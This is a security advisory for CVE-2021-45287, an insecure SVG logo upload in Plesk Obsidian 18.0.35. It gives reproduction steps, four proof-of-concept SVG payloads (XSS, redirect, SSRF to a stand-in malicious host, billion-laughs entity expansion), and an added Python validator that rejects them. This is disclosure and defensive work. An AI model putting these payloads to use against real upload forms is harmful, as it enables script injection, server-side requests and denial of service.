An insecure upload function was discovered in the Plesk branding logo feature.
By uploading a crafted SVG file as the logo, it is possible to achieve stored XSS, redirection, SSRF and XXE.
CVE: CVE-2021-45287
Product: https://www.plesk.com/
Tested Version: Plesk Obsidian 18.0.35 Update #1
Fixed version: Plesk Obsidian 18.0.37
STEPS TO REPRODUCE:
1. Go to: https://domain.com/plesk/logo/
2. Upload an SVG file with the malicious content.
3. Return to the main web page, right-click the brand logo and select "Open image in new tab". The code is executed.
_______________POC XSS_______________
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
_______________POC_REDIRECTION_______________
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
______________POC_SSRF_______________
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="30" width="30"
xlink:href="https://malicious.site/malicious.php" />
</svg>
_________POC_XXE_BILLION_LAUGHS_READ_NOTE_PLS____________
!!!!!!!!!!!!!!!!!!IMPORTANT NOTE!!!!!!!!!!!!!!!!!!!!!!!!!!!
DO NOT USE THIS ON PRODUCTION ENVIRONMENT, IT CAUSES A DENIAL OF SERVICE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="23" x="8" y="28"></text>
</svg>
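A server-side check that would reject all four payload classes above at upload time, added here as an example; it is not part of the advisory and not Plesk's own fix. It refuses any DTD before parsing (XXE and entity expansion), then walks the parsed tree and rejects script-bearing elements, on* event handlers, external href/xlink:href targets and external url() references. The embedded samples are constructed, ASCII-quoted reductions of the page's PoCs.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that execute script, pull external resources or navigate the page.
FORBIDDEN_TAGS = {"script", "foreignObject", "style", "a", "image", "feImage"}
HREF_ATTRS = {"href", "{%s}href" % XLINK_NS}
# Refuse any DTD before the parser ever sees it: covers XXE and billion laughs.
DECL_RE = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)
EXT_URL_RE = re.compile(r"url\(\s*['\"]?(?!#)", re.IGNORECASE)  # url(...) not a fragment

def local_name(qname):
    return qname.rsplit("}", 1)[-1]

def validate_svg(data: bytes):
    """Return (accepted, reason) for an uploaded logo; only plain vector content passes."""
    if DECL_RE.search(data):
        return False, "DOCTYPE/ENTITY declaration (XXE / entity expansion)"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, "not well-formed XML: %s" % exc
    if root.tag != "{%s}svg" % SVG_NS:
        return False, "root element is not <svg> in the SVG namespace"
    for el in root.iter():
        name = local_name(el.tag)
        if name in FORBIDDEN_TAGS:
            return False, "forbidden element <%s>" % name
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):  # onload, onclick, ...
                return False, "event handler %s on <%s>" % (aname, name)
            if attr in HREF_ATTRS and not value.strip().startswith("#"):
                return False, "external reference in %s on <%s>" % (aname, name)
            if EXT_URL_RE.search(value):
                return False, "external url() in %s on <%s>" % (aname, name)
    return True, "ok"

# Constructed samples: reduced PoCs from the advisory (XSS one without its DTD) and a benign logo.
POC_XSS = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert("XSS")</script></svg>'
POC_REDIRECT = b'<svg onload="window.location=\'http://www.example.com\'" xmlns="http://www.w3.org/2000/svg"></svg>'
POC_SSRF = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<image xlink:href="https://malicious.site/malicious.php"/></svg>')
POC_XXE = b'<!DOCTYPE lolz [<!ENTITY lol "lol">]><svg xmlns="http://www.w3.org/2000/svg">&lol;</svg>'
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="#c00"/></svg>'

if __name__ == "__main__":
    for label, doc in [("xss", POC_XSS), ("redirect", POC_REDIRECT), ("ssrf", POC_SSRF), ("xxe", POC_XXE), ("benign", BENIGN)]:
        print(label, validate_svg(doc))
```

Validation is only one layer: the logo should also be served with a Content-Type and headers that do not let an SVG run in the panel's origin.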